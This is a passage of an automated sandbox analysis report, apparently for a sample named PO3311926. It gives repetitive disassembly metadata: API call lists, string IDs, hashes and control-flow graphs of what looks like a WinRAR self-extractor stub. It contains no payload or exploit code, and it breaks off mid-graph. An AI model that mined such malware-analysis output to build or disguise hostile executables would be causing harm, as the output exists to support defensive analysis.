                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: 91e7ac6fa28c44b192d628f3be9d5e07182272050d8057d37c446b51de968430
                                                                                              • Instruction ID: c6343c55ce0eb9d6bb451240027d6b5b0f222340762324117a2825e373aeec37
                                                                                              • Opcode Fuzzy Hash: 91e7ac6fa28c44b192d628f3be9d5e07182272050d8057d37c446b51de968430
                                                                                              • Instruction Fuzzy Hash: A8418E72900115ABCB25DF68CC84AEAF7F8FB49350F1041E6E569E3210D7346E94CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002,00000000), ref: 00BC7E0F
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00BC7DC4,?,00BDC300,0000000C,00BC7F1B,?,00000002,00000000), ref: 00BC7E16
                                                                                              • ExitProcess.KERNEL32 ref: 00BC7E28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 2c35ab3358b6d38fd9dc44be54df37d05c9d92978870acf497fc0e7754c8bf2c
                                                                                              • Instruction ID: 73dff00b61a62c3d541a3914d9563ab4131a3b307576361d0cda30b4fc89fa03
                                                                                              • Opcode Fuzzy Hash: 2c35ab3358b6d38fd9dc44be54df37d05c9d92978870acf497fc0e7754c8bf2c
                                                                                              • Instruction Fuzzy Hash: A1E04632001148ABCF016F20CD1AF4ABFEAEB00741F0044A9F809AB133DF36DE92CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 76d7a32b3fb20111089b3edf78300914771ef8260f99e285ebf2841d92d8ff77
                                                                                              • Instruction ID: 74e95970f3cc0c126c62d22433dd55f25e9ed0396408e73c1f7fb7835efba6c4
                                                                                              • Opcode Fuzzy Hash: 76d7a32b3fb20111089b3edf78300914771ef8260f99e285ebf2841d92d8ff77
                                                                                              • Instruction Fuzzy Hash: 5C82F970908245AEDF25DF64C895BFABBF9EF17300F0845F9E8499B542DB315A84CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 2bb4b101806af7d08bba43e230e9f2207d48140212e750fcf3b681e3f443416b
                                                                                              • Instruction ID: a4350e6b2032f048f28947c530fca6c40942c6b898f6402d93e16cc50fed41c8
                                                                                              • Opcode Fuzzy Hash: 2bb4b101806af7d08bba43e230e9f2207d48140212e750fcf3b681e3f443416b
                                                                                              • Instruction Fuzzy Hash: 59D196716483458FDB14DF28C8847ABBBE1FF99308F0445ADE8899B242D7B4ED05CB56
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BBB7E5
                                                                                                • Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
                                                                                                • Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBB8D1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB8EF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00BBB902
                                                                                              • TranslateMessage.USER32(?), ref: 00BBB910
                                                                                              • DispatchMessageW.USER32(?), ref: 00BBB91A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00BBB93D
                                                                                              • EndDialog.USER32(?,00000001), ref: 00BBB960
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00BBB983
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BBB99E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00BD35F4), ref: 00BBB9B1
                                                                                                • Part of subcall function 00BBD453: _wcslen.LIBCMT ref: 00BBD47D
                                                                                              • SetFocus.USER32(00000000), ref: 00BBB9B8
                                                                                              • _swprintf.LIBCMT ref: 00BBBA24
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                                • Part of subcall function 00BBD4D4: GetDlgItem.USER32(00000068,00BFFCB8), ref: 00BBD4E8
                                                                                                • Part of subcall function 00BBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00BBAF07,00000001,?,?,00BBB7B9,00BD506C,00BFFCB8,00BFFCB8,00001000,00000000,00000000), ref: 00BBD510
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BBD51B
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BD35F4), ref: 00BBD529
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD53F
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BBD559
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD59D
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BBD5AB
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD5BA
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD5E1
                                                                                                • Part of subcall function 00BBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BD43F4), ref: 00BBD5F0
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00BBBA68
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00BBBA90
                                                                                              • GetTickCount.KERNEL32 ref: 00BBBAAE
                                                                                              • _swprintf.LIBCMT ref: 00BBBAC2
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00BBBAF4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00BBBB43
                                                                                              • _swprintf.LIBCMT ref: 00BBBB7C
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00BBBBD0
                                                                                              • GetCommandLineW.KERNEL32 ref: 00BBBBEA
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00BBBC47
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00BBBC6F
                                                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00BBBCA5
                                                                                              • Sleep.KERNEL32(00000064), ref: 00BBBCB9
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00BBBCE2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BBBCEB
                                                                                              • _swprintf.LIBCMT ref: 00BBBD1E
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBBD7D
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00BD35F4), ref: 00BBBD94
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00BBBD9D
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00BBBDAC
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BBBDBB
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBBE68
                                                                                              • _wcslen.LIBCMT ref: 00BBBEBE
                                                                                              • _swprintf.LIBCMT ref: 00BBBEE8
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BBBF32
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00BBBF4C
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00BBBF55
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00BBBF6B
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00BBBF85
                                                                                              • SetWindowTextW.USER32(00000000,00BEA472), ref: 00BBBFA7
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00BBC007
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBC01A
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00BBC0BD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00BBC197
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00BBC1D9
                                                                                                • Part of subcall function 00BBC73F: __EH_prolog.LIBCMT ref: 00BBC744
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BBC1FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 2472041962-3026011734
                                                                                              • Opcode ID: 4c0ac05e4a20252433c8c574b50a51c40c9f0b29ea9a83de42d6728217a44acf
                                                                                              • Instruction ID: 5bc3c9da0cad46f46222e4b765793f2d6915253410762914b103856af11931c9
                                                                                              • Opcode Fuzzy Hash: 4c0ac05e4a20252433c8c574b50a51c40c9f0b29ea9a83de42d6728217a44acf
                                                                                              • Instruction Fuzzy Hash: 7E429171944299ABEB219B649C8AFFE7BFCEB05700F0000D5F645A71E2DBF49A44CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 267 bb0863-bb0886 call bbec50 GetModuleHandleW 270 bb0888-bb089f GetProcAddress 267->270 271 bb08e7-bb0b48 267->271 274 bb08b9-bb08c9 GetProcAddress 270->274 275 bb08a1-bb08b7 270->275 272 bb0b4e-bb0b59 call bc75fb 271->272 273 bb0c14-bb0c40 GetModuleFileNameW call bac29a call bb0602 271->273 272->273 284 bb0b5f-bb0b8d GetModuleFileNameW CreateFileW 272->284 289 bb0c42-bb0c4e call bab146 273->289 278 bb08cb-bb08e0 274->278 279 bb08e5 274->279 275->274 278->279 279->271 287 bb0c08-bb0c0f CloseHandle 284->287 288 bb0b8f-bb0b9b SetFilePointer 284->288 287->273 288->287 290 bb0b9d-bb0bb9 ReadFile 288->290 296 bb0c7d-bb0ca4 call bac310 GetFileAttributesW 289->296 297 bb0c50-bb0c5b call bb081b 289->297 290->287 293 bb0bbb-bb0be0 290->293 295 bb0bfd-bb0c06 call bb0371 293->295 295->287 304 bb0be2-bb0bfc call bb081b 295->304 307 bb0cae 296->307 308 bb0ca6-bb0caa 296->308 297->296 306 bb0c5d-bb0c7b CompareStringW 297->306 304->295 306->296 306->308 309 bb0cb0-bb0cb5 307->309 308->289 311 bb0cac 308->311 312 bb0cec-bb0cee 309->312 313 bb0cb7 309->313 311->309 315 bb0dfb-bb0e05 312->315 316 bb0cf4-bb0d0b call bac2e4 call bab146 312->316 314 bb0cb9-bb0ce0 call bac310 GetFileAttributesW 313->314 321 bb0cea 314->321 322 bb0ce2-bb0ce6 314->322 326 bb0d0d-bb0d6e call bb081b * 2 call bae617 call ba4092 call bae617 call bba7e4 316->326 327 bb0d73-bb0da6 call ba4092 AllocConsole 316->327 321->312 322->314 324 bb0ce8 322->324 324->312 334 bb0df3-bb0df5 ExitProcess 326->334 333 bb0da8-bb0ded GetCurrentProcessId AttachConsole call bc3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->333 327->334 333->334
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00BB087C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BB088E
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BB08BF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BB0B69
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BB0B83
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB0B93
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00BD3C7C,00000000), ref: 00BB0BB1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BB0C09
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BB0C1E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00BD3C7C,?,00000000,?,00000800), ref: 00BB0C72
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00BD3C7C,00000800,?,00000000,?,00000800), ref: 00BB0C9C
                                                                                              • GetFileAttributesW.KERNEL32(?,?,00BD3D44,00000800), ref: 00BB0CD8
                                                                                                • Part of subcall function 00BB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BB0836
                                                                                                • Part of subcall function 00BB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAF2D8,Crypt32.dll,00000000,00BAF35C,?,?,00BAF33E,?,?,?), ref: 00BB0858
                                                                                              • _swprintf.LIBCMT ref: 00BB0D4A
                                                                                              • _swprintf.LIBCMT ref: 00BB0D96
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                              • AllocConsole.KERNEL32 ref: 00BB0D9E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00BB0DA8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00BB0DAF
                                                                                              • _wcslen.LIBCMT ref: 00BB0DC4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BB0DD5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00BB0DDC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00BB0DE7
                                                                                              • FreeConsole.KERNEL32 ref: 00BB0DED
                                                                                              • ExitProcess.KERNEL32 ref: 00BB0DF5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1207345701-3298887752
                                                                                              • Opcode ID: 376a09342e4bccc37a3e0eddf7cfd05948505260a3fbbeed56ab36ff166df593
                                                                                              • Instruction ID: 627f575f32082543846d4bb8b32684a328795cddd6527e41619b41b0fc7405b9
                                                                                              • Opcode Fuzzy Hash: 376a09342e4bccc37a3e0eddf7cfd05948505260a3fbbeed56ab36ff166df593
                                                                                              • Instruction Fuzzy Hash: 94D167B2019344ABD3319F508859BEFFBE8EB85B04F50499EF18597251EBB08648CB63
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BADA70
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BADAAC
                                                                                                • Part of subcall function 00BAC29A: _wcslen.LIBCMT ref: 00BAC2A2
                                                                                                • Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0
                                                                                                • Part of subcall function 00BB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BABAE9,00000000,?,?,?,0001042E), ref: 00BB1BA0
                                                                                              • _wcslen.LIBCMT ref: 00BADDE9
                                                                                              • __fprintf_l.LIBCMT ref: 00BADF1C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: a4599576532354aac1f7a5608273a4b1a35aec2b8cbbf9427221f3539b7772df
                                                                                              • Instruction ID: 17dc9eb29f2d368d1237c105730a3581b88986ede5fd88c47ec2a1a5b0cce3e0
                                                                                              • Opcode Fuzzy Hash: a4599576532354aac1f7a5608273a4b1a35aec2b8cbbf9427221f3539b7772df
                                                                                              • Instruction Fuzzy Hash: 3C32D3719042189BCF24EF68C882BEE77E5FF16700F4045AAF916A7291E7B1DD85CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00BBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
                                                                                                • Part of subcall function 00BBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
                                                                                                • Part of subcall function 00BBB568: IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
                                                                                                • Part of subcall function 00BBB568: TranslateMessage.USER32(?), ref: 00BBB5AC
                                                                                                • Part of subcall function 00BBB568: DispatchMessageW.USER32(?), ref: 00BBB5B6
                                                                                              • GetDlgItem.USER32(00000068,00BFFCB8), ref: 00BBD4E8
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00BBAF07,00000001,?,?,00BBB7B9,00BD506C,00BFFCB8,00BFFCB8,00001000,00000000,00000000), ref: 00BBD510
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BBD51B
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00BD35F4), ref: 00BBD529
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD53F
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BBD559
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD59D
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BBD5AB
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BBD5BA
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BBD5E1
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00BD43F4), ref: 00BBD5F0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: 5bf629d9c2b23d110c9d3fba7d43046fd582c3a12a167eec4cad71cace609326
                                                                                              • Instruction ID: 0641710d7f47e949dc5ac369957c38ec6b8245d31223f18bd9304ecc4509b713
                                                                                              • Opcode Fuzzy Hash: 5bf629d9c2b23d110c9d3fba7d43046fd582c3a12a167eec4cad71cace609326
                                                                                              • Instruction Fuzzy Hash: 7D31E171146796AFE311DF209C4AFAF7FACEB86708F010508F551962A0EB748A04C7B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 656 bbd78f-bbd7a7 call bbec50 659 bbd9e8-bbd9f0 656->659 660 bbd7ad-bbd7b9 call bc3e13 656->660 660->659 663 bbd7bf-bbd7e7 call bbfff0 660->663 666 bbd7e9 663->666 667 bbd7f1-bbd7ff 663->667 666->667 668 bbd812-bbd818 667->668 669 bbd801-bbd804 667->669 671 bbd85b-bbd85e 668->671 670 bbd808-bbd80e 669->670 672 bbd810 670->672 673 bbd837-bbd844 670->673 671->670 674 bbd860-bbd866 671->674 677 bbd822-bbd82c 672->677 678 bbd84a-bbd84e 673->678 679 bbd9c0-bbd9c2 673->679 675 bbd868-bbd86b 674->675 676 bbd86d-bbd86f 674->676 675->676 680 bbd882-bbd898 call bab92d 675->680 676->680 681 bbd871-bbd878 676->681 682 bbd81a-bbd820 677->682 683 bbd82e 677->683 684 bbd9c6 678->684 685 bbd854-bbd859 678->685 679->684 691 bbd89a-bbd8a7 call bb1fbb 680->691 692 bbd8b1-bbd8bc call baa231 680->692 681->680 686 bbd87a 681->686 682->677 688 bbd830-bbd833 682->688 683->673 690 bbd9cf 684->690 685->671 686->680 688->673 693 bbd9d6-bbd9d8 690->693 691->692 701 bbd8a9 691->701 702 bbd8d9-bbd8e6 ShellExecuteExW 692->702 703 bbd8be-bbd8d5 call bab6c4 692->703 696 bbd9da-bbd9dc 693->696 697 bbd9e7 693->697 696->697 700 bbd9de-bbd9e1 ShowWindow 696->700 697->659 700->697 701->692 702->697 704 bbd8ec-bbd8f9 702->704 703->702 707 bbd8fb-bbd902 704->707 708 bbd90c-bbd90e 704->708 707->708 709 bbd904-bbd90a 707->709 710 bbd910-bbd919 IsWindowVisible 708->710 711 bbd925-bbd938 WaitForInputIdle call bbdc3b 708->711 709->708 712 bbd97b-bbd987 CloseHandle 709->712 710->711 713 bbd91b-bbd923 ShowWindow 710->713 717 bbd93d-bbd944 711->717 715 bbd989-bbd996 call bb1fbb 712->715 716 bbd998-bbd9a6 712->716 713->711 715->690 715->716 716->693 719 bbd9a8-bbd9aa 716->719 717->712 720 bbd946-bbd94e 717->720 719->693 722 bbd9ac-bbd9b2 719->722 720->712 723 bbd950-bbd961 GetExitCodeProcess 720->723 722->693 724 bbd9b4-bbd9be 722->724 723->712 725 bbd963-bbd96d 723->725 724->693 726 bbd96f 